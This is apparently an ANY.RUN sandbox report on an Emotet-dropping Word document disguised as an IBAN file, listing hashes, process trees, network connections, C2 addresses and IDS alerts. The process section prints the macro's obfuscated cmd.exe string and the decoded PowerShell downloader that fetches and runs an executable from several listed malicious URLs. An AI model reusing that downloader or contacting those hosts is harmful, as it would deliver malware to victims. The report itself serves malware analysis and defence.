analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

IBAN_DE72 5780 6771 6576 1141 13.doc

Full analysis: https://app.any.run/tasks/46abb7f4-c686-4062-9605-e55eadf9cb0d
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 18, 2018, 13:47:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
trojan
emotet
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 07:36:00 2018, Last Saved Time/Date: Tue Dec 18 07:36:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 33, Security: 0
MD5:

ED69E90C9DD1006E827BA404B2DF6443

SHA1:

EE321906D9822FFFB8559E1BE7852D10D753D286

SHA256:

734A5A7DB9947C9489E773B659F1F565DDAFCFDDD3414BE94EB56B1595A4A2D4

SSDEEP:

1536:FL4w1LD4fbKghmXB5luOUom8uW41LIpiXievnH+a9:Fcw13eKQOUo101O+iev

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2992)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2432)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2992)
    • Application was dropped or rewritten from another process

      • 995.exe (PID: 3476)
      • 995.exe (PID: 2664)
      • archivesymbol.exe (PID: 636)
      • archivesymbol.exe (PID: 2916)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2320)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2320)
    • EMOTET was detected

      • archivesymbol.exe (PID: 2916)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 2916)
    • Connects to CnC server

      • archivesymbol.exe (PID: 2916)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3932)
    • Creates files in the user directory

      • powershell.exe (PID: 2320)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2320)
      • 995.exe (PID: 2664)
    • Starts itself from another location

      • 995.exe (PID: 2664)
    • Connects to unusual port

      • archivesymbol.exe (PID: 2916)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2992)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2992)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:18 07:36:00
ModifyDate: 2018:12:18 07:36:00
Pages: 1
Words: 5
Characters: 33
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 37
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 995.exe no specs 995.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
2992"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\IBAN_DE72 5780 6771 6576 1141 13.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3932c:\sVwCiOzTWNiPm\WzCkFlcVSW\VlBsmipsbU\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set W6XZ=;'jcW'=Fjo$}}{hctac}};kaerb;'TLz'=lbz$;SEc$ metI-ekovnI{ )00008 eg- htgnel.)SEc$ metI-teG(( fI;'qpt'=whj$;)SEc$ ,NFz$(eliFdaolnwoD.ztL${yrt{)qjP$ ni NFz$(hcaerof;'exe.'+WCk$+'\'+pmet:vne$=SEc$;'SKz'=Tcu$;'599' = WCk$;'lvI'=brk$;)'@'(tilpS.'Of3mJi1/moc.gepohsknip.www//:ptth@0vb6pEI/gro.laiafamafa.www//:ptth@8IIXV32/gro.amhcim//:ptth@fURWISRxU8/moc.secivresretupmocaesnaws.www//:ptth@0NgwrKGs2Y/moc.oknecvov-llatsnner.www//:ptth'=qjP$;tneilCbeW.teN tcejbo-wen=ztL$;'rvj'=tZz$ llehsrewop&&for /L %X in (485,-1,0)do set Pjv=!Pjv!!W6XZ:~%X,1!&&if %X leq 0 call %Pjv:*Pjv!=%"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2432CmD /V/C"set W6XZ=;'jcW'=Fjo$}}{hctac}};kaerb;'TLz'=lbz$;SEc$ metI-ekovnI{ )00008 eg- htgnel.)SEc$ metI-teG(( fI;'qpt'=whj$;)SEc$ ,NFz$(eliFdaolnwoD.ztL${yrt{)qjP$ ni NFz$(hcaerof;'exe.'+WCk$+'\'+pmet:vne$=SEc$;'SKz'=Tcu$;'599' = WCk$;'lvI'=brk$;)'@'(tilpS.'Of3mJi1/moc.gepohsknip.www//:ptth@0vb6pEI/gro.laiafamafa.www//:ptth@8IIXV32/gro.amhcim//:ptth@fURWISRxU8/moc.secivresretupmocaesnaws.www//:ptth@0NgwrKGs2Y/moc.oknecvov-llatsnner.www//:ptth'=qjP$;tneilCbeW.teN tcejbo-wen=ztL$;'rvj'=tZz$ llehsrewop&&for /L %X in (485,-1,0)do set Pjv=!Pjv!!W6XZ:~%X,1!&&if %X leq 0 call %Pjv:*Pjv!=%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2320powershell $zZt='jvr';$Ltz=new-object Net.WebClient;$Pjq='http://www.rennstall-vovcenko.com/Y2sGKrwgN0@http://www.swanseacomputerservices.com/8UxRSIWRUf@http://michma.org/23VXII8@http://www.afamafaial.org/IEp6bv0@http://www.pinkshopeg.com/1iJm3fO'.Split('@');$krb='Ivl';$kCW = '995';$ucT='zKS';$cES=$env:temp+'\'+$kCW+'.exe';foreach($zFN in $Pjq){try{$Ltz.DownloadFile($zFN, $cES);$jhw='tpq';If ((Get-Item $cES).length -ge 80000) {Invoke-Item $cES;$zbl='zLT';break;}}catch{}}$ojF='Wcj';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3476"C:\Users\admin\AppData\Local\Temp\995.exe" C:\Users\admin\AppData\Local\Temp\995.exepowershell.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
2664"C:\Users\admin\AppData\Local\Temp\995.exe"C:\Users\admin\AppData\Local\Temp\995.exe
995.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
636"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe995.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
2916"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Version:
8.00.0.010
Total events
1 732
Read events
1 243
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
7

Dropped files

PID
Process
Filename
Type
2992WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA6D2.tmp.cvr
MD5:
SHA256:
2992WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8CE1C2A.wmf
MD5:
SHA256:
2992WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\417915C8.wmf
MD5:
SHA256:
2320powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0OCDH2CG6CZ51P904D10.temp
MD5:
SHA256:
2992WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C0E05B10780841AE15969333DA0BFE18
SHA256:8C88F01A0964845A6E238B57D62EF68368276FA649122C778F7D617F63C6E443
2992WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:2052B041A825DB3A99D7C993734730E6
SHA256:5C2DE7872067DA7BB4C416E52E54EA1BDB2B8729400BBC4806FCA109E20E6524
2992WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:AFE9BB88CD35BB5D8366DB1378B13304
SHA256:ADF9E10BC2AB0B90746BD68BDADFD9A9AB2C2924BB59DF1C7784739B47A45541
2992WINWORD.EXEC:\Users\admin\Desktop\~$AN_DE72 5780 6771 6576 1141 13.docpgc
MD5:1A590EEB667CDC4A0A9D09FDD998A36C
SHA256:A942E931932054A1ED627F55AFCA5C32042D49BAAE9C82044A3D176025C55054
2992WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\IBAN_DE72 5780 6771 6576 1141 13.doc.LNKlnk
MD5:FC81E73A8DFDD2CB6E02C4A7E7C29D71
SHA256:DF7AE3735C7D8F3EE380598AE2E424507B75151C13C7E3F3DC09C17B188DBF22
2320powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
9
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2916
archivesymbol.exe
GET
187.140.90.91:8080
http://187.140.90.91:8080/
MX
malicious
2916
archivesymbol.exe
GET
78.189.21.131:80
http://78.189.21.131/
TR
malicious
2916
archivesymbol.exe
GET
201.190.150.60:443
http://201.190.150.60:443/
AR
malicious
2916
archivesymbol.exe
GET
181.197.253.133:8080
http://181.197.253.133:8080/
AR
suspicious
2320
powershell.exe
GET
301
93.90.146.103:80
http://www.rennstall-vovcenko.com/Y2sGKrwgN0
SE
html
253 b
malicious
2320
powershell.exe
GET
200
93.90.146.103:80
http://www.rennstall-vovcenko.com/Y2sGKrwgN0/
SE
executable
124 Kb
malicious
2916
archivesymbol.exe
GET
200
70.55.69.202:7080
http://70.55.69.202:7080/
CA
binary
132 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2916
archivesymbol.exe
213.120.119.231:8443
British Telecommunications PLC
GB
malicious
2916
archivesymbol.exe
187.140.90.91:8080
Uninet S.A. de C.V.
MX
malicious
2916
archivesymbol.exe
78.189.21.131:80
Turk Telekom
TR
malicious
2320
powershell.exe
93.90.146.103:80
www.rennstall-vovcenko.com
Levonline AB
SE
suspicious
2916
archivesymbol.exe
201.190.150.60:443
ARLINK S.A.
AR
malicious
2916
archivesymbol.exe
81.150.17.158:50000
British Telecommunications PLC
GB
malicious
2916
archivesymbol.exe
81.150.17.158:8443
British Telecommunications PLC
GB
malicious
2916
archivesymbol.exe
181.197.253.133:8080
BVNET S.A.
AR
suspicious
2916
archivesymbol.exe
70.55.69.202:7080
Bell Canada
CA
suspicious

DNS requests

Domain
IP
Reputation
www.rennstall-vovcenko.com
  • 93.90.146.103
malicious

Threats

PID
Process
Class
Message
2320
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2320
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2320
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2320
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2320
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2916
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
2916
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
2916
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
2916
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
2916
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
5 ETPRO signatures available at the full report
No debug info